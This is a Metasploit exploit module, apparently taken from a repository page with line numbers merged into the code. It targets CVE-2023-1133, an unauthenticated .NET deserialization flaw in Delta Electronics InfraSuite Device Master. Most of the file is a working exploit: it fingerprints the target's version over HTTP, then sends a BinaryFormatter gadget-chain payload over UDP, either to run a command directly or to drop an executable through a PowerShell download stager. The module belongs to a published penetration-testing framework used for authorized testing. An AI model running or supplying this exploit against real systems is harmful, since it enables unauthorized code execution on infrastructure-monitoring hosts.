Path: blob/master/modules/exploits/windows/misc/delta_electronics_infrasuite_deserialization.rb
32676 views
# This module requires Metasploit: https://metasploit.com/download1# Current source: https://github.com/rapid7/metasploit-framework23class MetasploitModule < Msf::Exploit::Remote45Rank = ExcellentRanking67include Msf::Exploit::CmdStager8include Msf::Exploit::Remote::HttpClient9include Msf::Exploit::Remote::Udp10prepend Msf::Exploit::Remote::AutoCheck1112def initialize(info = {})13super(14update_info(15info,16'Name' => 'Delta Electronics InfraSuite Device Master Deserialization',17'Description' => %q{18Delta Electronics InfraSuite Device Master versions below v1.0.5 have an19unauthenticated .NET deserialization vulnerability within the 'ParseUDPPacket()'20method of the 'Device-Gateway-Status' process.2122The 'ParseUDPPacket()' method reads user-controlled packet data and eventually23calls 'BinaryFormatter.Deserialize()' on what it determines to be the packet header without appropriate validation,24leading to unauthenticated code execution as the user running the 'Device-Gateway-Status' process.25},26'Author' => [27'Anonymous', # Vulnerability discovery28'Shelby Pace' # Metasploit module29],30'License' => MSF_LICENSE,31'References' => [32['CVE', '2023-1133'],33['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-23-672/'],34['URL', 'https://attackerkb.com/topics/owl4Xz8fKW/cve-2023-1133']35],36'Platform' => 'win',37'Privileged' => false,38'Targets' => [39[40'Windows EXE Dropper',41{42'Arch' => [ARCH_X86, ARCH_X64],43'Type' => :windows_dropper,44'CmdStagerFlavor' => :psh_invokewebrequest45}46],47[48'Windows CMD',49{50'Arch' => [ARCH_CMD],51'Type' => :windows_cmd52}53],54],55'DefaultTarget' => 0,56'DisclosureDate' => '2023-05-17',57'Notes' => {58'Stability' => [CRASH_SAFE],59'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS, SCREEN_EFFECTS],60'Reliability' => [REPEATABLE_SESSION]61}62)63)6465register_options([66Opt::RPORT(10100),67OptInt.new('INFRASUITE_PORT', [ true, 'The port on which the InfraSuite Manager is listening', 80 ]),68OptString.new('TARGETURI', [ true, 'The base path to the InfraSuite Manager', '/' ])69])70end7172def check73print_status('Requesting the login page to determine if target is InfraSuite Device Master...')74res = send_request_cgi(75'method' => 'GET',76'rport' => datastore['INFRASUITE_PORT'],77'uri' => normalize_uri(target_uri.path, 'login.html')78)7980return CheckCode::Unknown unless res8182unless res.body.include?('InfraSuite Manager Login')83return CheckCode::Safe('Target does not appear to be InfraSuite Device Master.')84end8586print_status('Target is InfraSuite Device Master. Now attempting to determine version.')87res = send_request_cgi(88'method' => 'GET',89'rport' => datastore['INFRASUITE_PORT'],90'uri' => normalize_uri(target_uri.path, 'js/webcfg.js')91)9293unless res&.body&.include?('var devicemasterCfg')94return CheckCode::Detected('Discovered InfraSuite Device Master, but couldn\'t determine version.')95end9697version = res.body.match(/version:'(\d+(?:\.\d+)+[a-zA-Z]?)'/)98unless version && version.length > 199return CheckCode::Detected('Failed to find version string')100end101102version = version[1]103vprint_status("Found version '#{version}' of InfraSuite Device Master")104r_vers = Rex::Version.new(version)105106return CheckCode::Appears if r_vers < Rex::Version.new('1.0.5')107108CheckCode::Safe109end110111def exploit112connect_udp113case target['Type']114when :windows_dropper115execute_cmdstager116when :windows_cmd117execute_command(payload.encoded)118end119end120121def execute_command(cmd, _opts = {})122serialized = ::Msf::Util::DotNetDeserialization.generate(123cmd,124gadget_chain: :ClaimsPrincipal,125formatter: :BinaryFormatter126)127128pkt = "\x01#{[ serialized.length ].pack('n')}#{serialized}"129udp_sock.put(pkt)130end131132def cleanup133disconnect_udp134end135end136137138